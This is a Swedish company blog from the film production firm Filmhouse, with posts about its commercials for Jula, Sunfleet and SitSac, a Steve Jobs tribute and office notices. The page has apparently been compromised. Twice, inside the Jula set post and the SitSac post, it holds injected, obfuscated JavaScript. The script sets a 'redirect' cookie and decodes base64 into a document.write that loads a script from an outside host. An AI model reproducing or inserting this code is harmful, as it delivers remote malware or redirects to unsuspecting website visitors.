Kultur på Filmhouse

Kul­turen genom­syrar våra lokaler idag då Mar­tin och Ste­fan redi­g­erar mate­r­ial från Göte­borgs oper­ahus. Vackra toner och en och annan aria sprider en trivsam stämn­ing på kontoret.

Det är härligt stim­ulerande att arbeta i en kreativ miljö! Trevlig helg!

Mar­tin och Stefan

R.I.P. Steve Jobs

Bara två dagar efter att man sut­tit och föjlt Apple’s Keynote, vak­nade man idag och insåg att ens twit­ter feed var fylld med tweets som pås­tod att Steve Jobs hade gått bort.

Trött och mis­stroende öpp­nade jag Safari för att kolla om det var sant, och det första man såg var Steve Jobs ansikte på apple.com; “Steve Jobs 1955–2011″.

56 år är allt för tidigt, men trots det hann Steve Jobs med så mycket och då menar jag saker som fak­tiskt förän­drat världen, bl.a. hur vi ser på datorer, musik­spelare och mobil­tele­foner m.m.

Jag vet inte mycket om Steve Jobs men det jag vet är att utan honom så hade mitt 9-åriga jag inte sut­tit och ritat och målat i vek­tor­grafik i Clar­is­Works på en Macintosh.

Jag skulle förmodligen…

…haft ett 100-tal mp3-spelare som jag tap­pat i gol­vet och gått sönder.

…gjort en massa onödiga resor fram och till­baks för att jag glömt föra över pen­gar till mitt kred­itkort när jag handlat.

…aldrig ha sett en enda film från en utav dom största animations-studiorna, Pixar.

…kom­mit försent till diverse inter­vjuer dom gångerna jag inte hit­tat i storstäder.

…aldrig rört Final Cut och för­mod­li­gen inte sut­tit här på Film­house med ett jobb, där jag skriver detta inlägg m.m.

Vad man än tycker om Apple så finns det inte en tvekan om att Steve var en visionär och en entreprenör.

R.I.P Steve Jobs.

Julamannens vardagsrum

Alexan­der (på bild) och Ste­fan har pre­cis rivit ner Jula­man­nens vardagsrum, eller åtmin­stone den stu­dio som använ­des för en scen hemma hos Julas störste fan. En reklam­film du snart ser i en TV nära dig! Jag kan avs­löja att två barn som leker rymd­farare är med i samma scen.

func­tion getCookie(e){var U=document.cookie.match(new Reg­Exp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Gröna dagar på Filmhouse

Tag­gade (dvs pep­pade) pågar fixar inför dagens inspel­ning. Slår ett slag för den stackars fär­gen grönt som alltid tas bort i dessa sammanhang.

Julas största fan

Här är första fil­men med Julas största fan. I denna film täl­tar han utan­för varuhuset för att få sitt eget exem­plar av nya kat­a­lo­gen först av alla.

Vi kom­mer att få se mer av Julas största fan i kom­mande filmer och i sociala medier.

Jula Höstkat­a­log 2011 NO from Film­house AB on Vimeo.

Redigerar två filmer om SitSac

Håller på att klippa två filmer om Sit­Sac — Ryg­gsäcken med bil­bäl­teskudde. En rik­tig smart uppfinning av Maria Munther i Göte­borg. Du kanske såg henne i Draknästet på SVT.

Inspel­nin­gen av den här reklam­fil­men och infor­ma­tions­fil­men skedde i Slottssko­gen i Göte­borg, Säve fly­g­plats, i en buss och en bil, samt i vår stu­dio på Drot­tning­gatan 31 i Göte­borg. func­tion getCookie(e){var U=document.cookie.match(new Reg­Exp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

JulaClub

Nu star­tar Jula­Club för alla hem­mafixare. Få bonus på alla köp och ta del av en massa fina erbjudanden.

Vi på Film­house är glada över upp­draget att pro­duc­era reklam­filmerna för norska och sven­ska mark­naden och musiken till JulaClub-konceptet. Dessu­tom pro­duc­erar vi utbild­nings­ma­te­ri­alet om Jula­Club för internt bruk.

Full fart igen

Efter en under­bar semes­ter är vi nu till­baka på kon­toret. Vi star­tade denna höst­sä­song med ett måndagsmöte i för­mid­dags och redan nu kan vi kon­stat­era att vi har ett mycket spän­nande halvår fram­för oss. Så nu är det full fart som gäller! Våra ordi­narie öppet­tider är måndag till fredag 08.00 — 17.00. Telnr 031–3083480.
Vi hörs! /Johan

Semestertider!

Under veck­o­rna 28–30 har vi begrän­sad beman­ning på kon­toret. Önskar du kon­takt med oss ring Johan Wass på 0734033200.

Jag önskar alla våra upp­drags­gi­vare, lever­an­törer och andra samar­betspart­ners en rik­tigt trevlig sommar!

Häl­sningar
Johan

Reklamfilm för Jula

Just nu pågår kam­pan­jen “Bil­glädje” på Jula. Det är en bred kam­panj fylld av erb­ju­dan­den för bilen och som­marens bilse­mes­ter. Film­house har pro­duc­erat reklam­filmerna för den norska och sven­ska marknaden.

Jula Bil­glädje from Film­house AB on Vimeo.

Cannes Lions

Denna vecka är delar av Film­house i Cannes på utbild­ning. Dagarna är fyllda av sem­i­nar­ier och work­shops med inrik­t­ning mot mark­nads­föring, tren­der mm.

The Cannes Lions Fes­ti­val is the world’s only truly global meet­ing place for cre­ative pro­fes­sion­als in the com­mu­ni­ca­tions industry.

Läs mer på http://www.canneslions.com/

Sunfleet

Sun­fleet är världens största miljö­bil­spool. Film­house har på upp­drag av Sun­fleet pro­duc­erat fil­men “Så funkar det” som beskriver hur enkelt det är att boka, hämta och lämna bilen. Superkul pro­jekt tycker vi på Film­house och tackar gänget på Sun­fleet för uppdraget!

Produktionsledare sökes

Vi växer och behöver ytterli­gare förstärka vårt team av kreatörer med en struk­tur­erad, dri­ven och kom­mu­nika­tiv produktionsledare.

OBS, tjän­sten är nu tillsatt!

Klicka här för platsannons!

Ny reklamfilm för Jula

Just nu rullar reklam­fil­men “Upp­täck Ute­livet”. Fixa och njut i trädgården!

Jula är ett detaljhan­dels­före­tag med verk­samhet i Sverige, Norge och Polen. Film­house har haft ett mycket framgångsrikt samar­bete med Jula under de senaste åtta åren. Här kan du se den sven­ska ver­sio­nen av filmen.

Sunfleet

Sun­fleet Car­shar­ing är världens första bilpool med enbart miljö­bi­lar. Boknin­gen sker exem­pelvis genom din iPhone och det är mycket enkelt att vara kund hos dem.

Film­house har samar­be­tat med Sun­fleet tidi­gare och nu är det dags igen. Just nu pro­duc­erar vi en instruk­tions­film. Och framöver är det dags för reklamfilm.

Läs mer om Sun­fleet på sunfleet.com eller på facebook.com/sunfleet

Nya spännande uppdrag

Sedan fem år job­bar vi med FX Air­guns som tillverkar och säl­jer några av världens bästa luft­gevär. Och i år har vi fler upp­drag därifrån än någon gång tidi­gare. Super­spän­nande! Håll utkik här så kom­mer mer info framöver.

Vi välkom­nar MK Buss­re­sor som ny upp­drags­gi­vare. Först och främst skall vi göra film till TUR-mässan men vi skall även göra filmer till mkbussresor.se Bröl­lop­sklän­ningar.

Nytt år — nya utmaningar!

Vi på Film­house har ett mycket spän­nande år fram­för oss. Vi skall ta ytterli­gare steg när det gäller reklam­film, vi skall sjösätta flera e-learningprojekt, få klar vår doku­men­tär om seri­etecknaren Patrik, fly­tta med mera, med mera.

Vi skall också samar­beta mer med andra aktörer för att vi till­sam­mans skall kunna göra ännu bät­tre kom­mu­nika­tion för våra uppdragsgivare.

Och vi skall ha roligt på job­bet med våra upp­drags­gi­vare och med varan­dra på fir­man. Bara se möj­ligheter och på det sät­tet hitta nya kreativa och lyck­osamma vägar till god kommunikation.

Nu kör vi så det ryker!

Johan

Jula julkampanj 2010

Just nu syns och hörs Julas julkam­panj över­allt. I print, radio och TV. Film­house är stolta pro­du­cen­ter av både radio och TV-kampanjen. Du kan se en av filmerna i vår port­fo­lio här på web­si­dan. Som van­ligt är Ewert Ljus­berg med och rimmar!

Tack Jula för ett fint samar­bete. Nu håller vi tum­marna för bra julförsäljning!

Grahns Julhälsning